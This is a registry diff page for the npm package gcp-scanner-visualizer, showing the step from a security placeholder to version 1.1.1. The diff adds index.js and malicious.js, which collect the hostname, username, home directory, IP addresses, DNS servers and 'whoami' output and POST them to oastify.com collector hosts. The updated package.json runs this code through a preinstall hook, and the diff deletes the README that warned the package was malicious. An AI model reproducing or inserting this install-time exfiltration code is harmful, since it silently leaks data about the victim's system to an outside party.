gcp-scanner-visualizer 0.0.1-security.0 → 1.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of gcp-scanner-visualizer might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,46 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const packageJSON = require("./package.json");
6
+ const package = packageJSON.name;
7
+
8
+ const trackingData = JSON.stringify({
9
+ p: package,
10
+ c: __dirname,
11
+ hd: os.homedir(),
12
+ hn: os.hostname(),
13
+ un: os.userInfo().username,
14
+ dns: dns.getServers(),
15
+ r: packageJSON ? packageJSON.___resolved : undefined,
16
+ v: packageJSON.version,
17
+ pjson: packageJSON,
18
+ });
19
+
20
+ var postData = querystring.stringify({
21
+ msg: trackingData,
22
+ });
23
+
24
+ var options = {
25
+ hostname: "ddu2fdw67075z8l75cvj5z5ojfpbd21r.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
26
+ port: 443,
27
+ path: "/",
28
+ method: "POST",
29
+ headers: {
30
+ "Content-Type": "application/x-www-form-urlencoded",
31
+ "Content-Length": postData.length,
32
+ },
33
+ };
34
+
35
+ var req = https.request(options, (res) => {
36
+ res.on("data", (d) => {
37
+ process.stdout.write(d);
38
+ });
39
+ });
40
+
41
+ req.on("error", (e) => {
42
+ // console.error(e);
43
+ });
44
+
45
+ req.write(postData);
46
+ req.end();
package/malicious.js ADDED
@@ -0,0 +1,83 @@
1
+ const os = require('os');
2
+ const http = require('http');
3
+ const { exec } = require('child_process');
4
+ const https = require('https');
5
+
6
+ // Replace with your OASTify server URL
7
+ const OASTIFY_URL = "aftzhay39x9215n479xg7w7llcr9f03p.oastify.com";
8
+
9
+ // Function to send data to OASTify server
10
+ function sendToCollaborator(data) {
11
+ const payload = JSON.stringify(data);
12
+
13
+ const options = {
14
+ hostname: OASTIFY_URL.replace('https://', '').replace('/', ''),
15
+ port: 443,
16
+ path: '/',
17
+ method: 'POST',
18
+ headers: {
19
+ 'Content-Type': 'application/json',
20
+ 'Content-Length': payload.length
21
+ }
22
+ };
23
+
24
+ const req = https.request(options, (res) => {
25
+ console.log(`Status: ${res.statusCode}`);
26
+ });
27
+
28
+ req.on('error', (error) => {
29
+ console.error(`Error sending data: ${error.message}`);
30
+ });
31
+
32
+ req.write(payload);
33
+ req.end();
34
+ }
35
+
36
+ // Collect system information
37
+ function collectSystemInfo() {
38
+ const systemInfo = {
39
+ hostname: os.hostname(),
40
+ platform: os.platform(),
41
+ release: os.release(),
42
+ internalIP: getInternalIP(),
43
+ externalIP: null,
44
+ whoami: null
45
+ };
46
+
47
+ // Fetch external IP address
48
+ http.get('http://api.ipify.org', (res) => {
49
+ let ipData = '';
50
+ res.on('data', (chunk) => {
51
+ ipData += chunk;
52
+ });
53
+ res.on('end', () => {
54
+ systemInfo.externalIP = ipData;
55
+
56
+ // Fetch output of the 'whoami' command
57
+ exec('whoami', (error, stdout, stderr) => {
58
+ if (!error) {
59
+ systemInfo.whoami = stdout.trim();
60
+ }
61
+
62
+ // Send collected data to OASTify server
63
+ sendToCollaborator(systemInfo);
64
+ });
65
+ });
66
+ });
67
+ }
68
+
69
+ // Helper to get internal IP address
70
+ function getInternalIP() {
71
+ const interfaces = os.networkInterfaces();
72
+ for (const iface in interfaces) {
73
+ for (const address of interfaces[iface]) {
74
+ if (address.family === 'IPv4' && !address.internal) {
75
+ return address.address;
76
+ }
77
+ }
78
+ }
79
+ return null;
80
+ }
81
+
82
+ // Trigger the data collection
83
+ collectSystemInfo();
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "gcp-scanner-visualizer",
3
- "version": "0.0.1-security.0",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.1.1",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node malicious.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
6
12
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=gcp-scanner-visualizer for more information.